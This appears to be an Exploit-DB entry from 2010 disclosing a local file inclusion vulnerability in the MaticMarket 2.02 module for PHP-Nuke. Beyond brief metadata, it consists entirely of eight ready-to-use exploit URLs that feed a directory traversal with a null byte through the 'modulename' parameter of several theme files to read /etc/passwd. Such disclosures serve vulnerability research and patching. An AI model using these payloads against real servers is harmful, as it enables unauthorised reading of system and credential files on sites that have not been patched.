PHP-Nuke MaticMarket 2.02 - Local File Inclusion

EDB-ID:

15783

CVE:

N/A


Author:

xer0x

Type:

webapps


Platform:

PHP

Date:

2010-12-20


#MaticMarket 2.02 for PHP Nuke LFI Vulnerability
#Url: http://sourceforge.net/projects/maticmarket
#Author: xer0x
#Expl:
http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/deco/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00